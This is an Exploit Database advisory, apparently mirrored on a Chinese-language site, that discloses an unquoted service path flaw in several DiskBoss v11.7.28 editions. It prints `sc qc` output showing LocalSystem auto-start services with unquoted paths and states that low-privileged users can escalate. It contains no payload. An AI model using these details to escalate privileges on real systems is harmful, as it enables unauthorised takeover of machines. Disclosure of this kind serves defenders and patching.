DiskBoss v11.7.28 – Multiple Services Unquoted Service Path

• Exploit Database
• 13 阅读

• 作者： Mohammed Alshehri
  日期： 2020-11-09
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49022/

• # Exploit Title: DiskBoss v11.7.28 - Multiple Services Unquoted Service Path
  # Date: 2020-8-20
  # Exploit Author: Mohammed Alshehri
  # Vendor Homepage: https://www.diskboss.com/
  # Software Link: https://www.diskboss.com/downloads.html
  # Version: v11.7.28
  # Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763
  
  # Product | Version
  # DiskBoss v11.7.28
  # DiskBoss Pro v11.7.28
  # DiskBoss Ultimate v11.7.28
  # DiskBoss Server v11.7.28
  # DiskBoss Enterprise v11.7.28
  
  # All the listed products are vulnerable to Unquoted Service path. Any low privileged user can elevate their privileges using any of these services.
  
  # Services info:
  
  C:\Users\m507>sc qc "DiskBoss Service"
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: DiskBoss Service
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 0 IGNORE
  BINARY_PATH_NAME : C:\Program Files\DiskBoss\bin\diskbsa.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : DiskBoss Service
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
  C:\Users\m507>
  
  C:\Users\m507>sc qc "DiskBoss Enterprise"
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: DiskBoss Enterprise
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 0 IGNORE
  BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Enterprise\bin\diskbss.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : DiskBoss Enterprise
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
  C:\Users\m507>
  
  C:\Users\m507>sc qc "DiskBoss Ultimate Service"
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: DiskBoss Ultimate Service
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 0 IGNORE
  BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Ultimate\bin\diskbsa.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : DiskBoss Ultimate Service
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
  C:\Users\m507>
  
  C:\Users\m507>sc qc "DiskBoss Server"
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: DiskBoss Server
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 0 IGNORE
  BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Server\bin\diskbss.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : DiskBoss Server
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
  C:\Users\m507>
  
  C:\Users\m507>sc qc "DiskBoss Pro Service"
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: DiskBoss Pro Service
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 0 IGNORE
  BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Pro\bin\diskbsa.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : DiskBoss Pro Service
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
  C:\Users\m507>
  
  # Exploit:
  This vulnerability could permit executing code during startup or reboot with the escalated privileges.